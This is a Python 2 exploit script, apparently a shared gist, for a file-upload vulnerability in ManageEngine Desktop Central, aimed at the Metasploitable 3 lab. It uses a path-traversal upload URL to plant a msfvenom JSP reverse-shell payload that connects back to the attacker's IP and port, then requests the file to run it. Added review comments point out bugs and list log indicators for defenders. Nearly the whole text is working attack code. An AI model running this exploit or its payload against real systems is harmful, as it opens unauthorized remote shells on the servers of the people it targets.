@joenorton8014
Created August 19, 2017 12:31
#!/usr/bin/python
import requests
import os
import subprocess
import psutil
import time
import sys
# A quick and dirty exploit of ManageEngine Desktop Central StatusUpdate Arbitrary File Upload
# Based off - https://www.exploit-db.com/exploits/34594/
# Meant for Metasploitable 3, hence the hardcoded msfvenom payload
# Creates the shell.jsp file on the attacker host, reads its content, POSTs that to the server,
# and the subsequent GET executes the shell
# No error checking!
# Flat Python 2 script (print statements): parse four positional arguments,
# build the upload and fetch URLs, generate a JSP payload with msfvenom,
# POST it to the upload endpoint, then GET the uploaded path.

# NOTE(review): the script reads sys.argv[4] below, so four arguments are
# required, but this guard only rejects fewer than three. With exactly three
# arguments the usage text is skipped and the attacker_port line raises
# IndexError.
if len(sys.argv) < 4:
    print "\nUsage: " + sys.argv[0] + " <TARGET> + <TARGET_PORT> + <ATTACKER_IP> + <ATTACKER_PORT>\n"
    print "For example: ./manageengine-exploit.py 192.168.55.229 8022 10.0.0.35 5555\n"
    print "Make sure you're netcat listener is running on the attacker host before starting the exploit!\n"
    sys.exit()
target = sys.argv[1]
target_port = sys.argv[2]
attacker = sys.argv[3]
attacker_port = sys.argv[4]
# POST parameters:
# The connectionId value carries "../" sequences and a trailing %00, and names
# jspf/shell.jsp -- the same path the later GET requests. That is the
# traversal the header comment's "Arbitrary File Upload" refers to.
# For defenders: requests to /fileupload whose connectionId contains "../" or
# "%00" are a high-confidence indicator in web/proxy logs, as are unexpected
# .jsp files appearing under the application's jspf directory. Mitigation is
# the vendor's fix for the StatusUpdate upload handler plus restricting
# network access to the Desktop Central port.
post = '/fileupload?connectionId=p/../../../../../jspf/shell.jsp%00&resourceId=p&action=rds_file_upload&computerName=tKPalt&customerId=978478'
# NOTE(review): post_headers is built here but never passed to requests.post
# below, and its Content-Length is a fixed string rather than the size of the
# body actually sent.
post_headers = {'Host': target + ':' + target_port,
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
    'Content-Type': 'application/octet-stream',
    'Content-Length': '148298'
    }
# GET parameters:
# get_headers, unlike post_headers, is passed to the final requests.get call.
get = '/jspf/shell.jsp'
get_headers = {'Host': target + ':' + target_port,
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
    'Content-Type': 'application/x-www-form-urlencoded'
    }
# Both URLs are plain http:// built by string concatenation from argv values.
post_url = 'http://' + target + ':' + target_port + post
get_url = 'http://' + target + ':' + target_port + get
# Generate the shell.jsp file:
# NOTE(review): the command line is assembled by concatenating argv values and
# run through os.popen, i.e. via a shell, so shell metacharacters in the
# arguments would be interpreted locally. The returned pipe is neither read
# nor closed; the fixed 10-second sleep is the only thing that waits for
# msfvenom to finish writing shell.jsp.
create_shell = 'msfvenom -p java/jsp_shell_reverse_tcp lhost=' + attacker + ' lport=' + attacker_port + ' -o shell.jsp'
print "Generating shell.jsp"
os.popen(create_shell)
time.sleep(10)
# This message is printed before the upload and fetch requests are made.
print "Shell generated, check your netcat listener!"
# Read the contents of the shell.jsp file and place them in payload_data variable:
# Newlines are stripped, so the payload is sent as a single line.
with open('shell.jsp', 'r') as myfile:
    payload_data=myfile.read().replace('\n', '')
# POST the shell:
# The response is stored in r but its status is never inspected (the header
# comment says as much: "No error checking!").
r = requests.post(post_url, data = payload_data)
# GET the shell:
# Requesting the uploaded path is what makes the server run the JSP; r is
# overwritten and again not checked.
r = requests.get(get_url, headers = get_headers)